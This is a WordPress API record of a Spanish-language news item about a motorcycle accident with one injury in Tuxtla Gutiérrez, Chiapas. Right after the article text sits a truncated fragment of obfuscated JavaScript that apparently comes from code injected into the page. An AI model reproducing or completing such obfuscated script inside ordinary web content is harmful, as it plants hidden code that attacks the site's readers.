{"id":17660,"date":"2024-09-03T03:00:03","date_gmt":"2024-09-03T03:00:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17660"},"modified":"2024-09-03T03:00:04","modified_gmt":"2024-09-03T03:00:04","slug":"un-herido-saldo-de-accidente-en-la-calzada-al-sumidero","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17660","title":{"rendered":"Un herido, saldo de accidente en la Calzada al Sumidero"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"761\" data-id=\"17661\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1725332281119.jpg\" alt=\"\" class=\"wp-image-17661\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1725332281119.jpg 960w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1725332281119-300x238.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1725332281119-768x609.jpg 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 2 de septiembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este lunes por la ma\u00f1ana, se registr\u00f3 un accidente de tr\u00e1nsito sobre la Calzada al Sumidero, a la altura de la Colonia Albania Baja, dejando un lesionado y da\u00f1os materiales de consideraci\u00f3n.<\/p>\n\n\n\n<p>Los reportes de tr\u00e1nsito informaron que, este hecho ocurri\u00f3 cuando una pareja que circulaba en una motocicleta Italika de color negro circulaba de Sur a Norte y de manera repentina una camioneta Tracker de color celeste dio vuelta en U en el retorno de la Colonia Reforma haciendo corte de circulaci\u00f3n.<\/p>\n\n\n\n<p>Por el golpe la pareja sali\u00f3 volando y se estrell\u00f3 contra el pavimento.<\/p>\n\n\n\n<p>Param\u00e9dicos de la Comisi\u00f3n Nacional de Emergencias y de la Cruz Roja brindaron la atenci\u00f3n prehospitalaria y los trasladaron a un nosocomio particular para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>En el lugar el conductor responsable se hizo cargo de los gastos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 2 de septiembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este lunes por la ma\u00f1ana, se registr\u00f3 un accidente de tr\u00e1nsito sobre la Calzada al Sumidero, a la altura de la Colonia Albania Baja, dejando un lesionado y da\u00f1os materiales de consideraci\u00f3n. Los reportes de tr\u00e1nsito informaron que, este hecho ocurri\u00f3 cuando una &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17662,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-17660","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17660","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17660"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17660\/revisions"}],"predecessor-version":[{"id":17663,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17660\/revisions\/17663"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17662"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17660"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17660"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17660"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}